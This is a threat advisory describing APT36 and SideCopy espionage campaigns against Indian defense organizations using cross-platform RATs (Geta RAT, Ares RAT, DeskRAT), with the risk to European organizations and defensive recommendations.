The threat involves coordinated cyber espionage campaigns by APT36 (Transparent Tribe) and SideCopy, targeting Indian defense and government-aligned organizations through cross-platform Remote Access Trojans (RATs) designed for Windows and Linux environments. The campaigns utilize phishing emails containing malicious Windows shortcut (LNK) files, ELF binaries, and PowerPoint Add-In files to initiate multi-stage infection chains. For Windows targets, the attack chain typically begins with a malicious LNK file that executes mshta.exe to run an HTA file hosted on compromised legitimate domains. This HTA file contains JavaScript that decrypts an embedded DLL payload, which writes a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and displays the decoy to the user. The malware then checks for installed security products and adapts its persistence method before deploying Geta RAT. Geta RAT provides extensive capabilities including system reconnaissance, process enumeration and termination, credential harvesting, clipboard manipulation, screenshot capture, file operations, arbitrary shell command execution, and data harvesting from USB devices. Parallel Linux campaigns deploy a Go binary that downloads a Python-based Ares RAT via shell scripts, offering similar espionage capabilities and command execution flexibility. Additionally, DeskRAT, a Golang-based RAT delivered through rogue PowerPoint Add-In files with embedded macros, is used to establish persistent remote access. These campaigns are characterized by stealth, memory-resident techniques, and evolving delivery vectors to maintain long-term access while operating below detection thresholds. The threat actors leverage defense-themed lures and regionally trusted infrastructure to increase success rates. Although no known public exploits are reported, the campaigns represent a persistent and evolving espionage threat with a focus on sensitive Indian sectors, extending to policy, research, critical infrastructure, and defense-adjacent organizations.

European organizations, especially those involved in defense, government, critical infrastructure, research, and policy sectors with ties or interests related to India or South Asia, could face indirect risks from similar espionage tactics or collateral targeting. The cross-platform nature of the RATs means both Windows and Linux systems are vulnerable, increasing the attack surface. The malware’s capabilities to steal sensitive data, harvest credentials, manipulate processes, and maintain persistent access could lead to significant confidentiality breaches, operational disruption, and long-term espionage. European entities collaborating with Indian defense or government agencies might be targeted for intelligence gathering or supply chain compromise. The use of regionally trusted infrastructure and sophisticated evasion techniques complicates detection and response, potentially allowing attackers to remain undetected for extended periods. While the campaigns are currently India-focused, the evolving toolkit and delivery methods could be adapted against European targets, especially in countries with strategic defense industries or geopolitical interest in South Asia. The threat also underscores the need for vigilance against phishing and supply chain attacks that leverage legitimate infrastructure for malware delivery.

European organizations should implement targeted defenses beyond generic advice: 1) Enhance phishing detection and user training focused on identifying malicious LNK files, PowerPoint Add-Ins, and unusual attachments, especially those mimicking defense or government documents. 2) Deploy advanced endpoint detection and response (EDR) solutions capable of detecting memory-resident malware and suspicious use of mshta.exe and PowerShell or script execution. 3) Monitor network traffic for connections to known or suspicious C2 servers, including those hosted on compromised legitimate domains, and employ DNS filtering to block access to malicious infrastructure. 4) Implement application whitelisting to restrict execution of unauthorized binaries, scripts, and macros, particularly on sensitive systems. 5) Conduct regular threat hunting exercises focusing on indicators of lateral movement, credential harvesting, and persistence mechanisms associated with Geta RAT, Ares RAT, and DeskRAT. 6) Harden Linux systems by restricting execution of unauthorized Go binaries and Python scripts, and monitor for unusual shell script downloads or executions. 7) Maintain up-to-date asset inventories and vulnerability management to quickly identify and remediate exposures. 8) Collaborate with national cybersecurity agencies and information sharing platforms to receive timely intelligence on emerging threats and indicators related to these campaigns.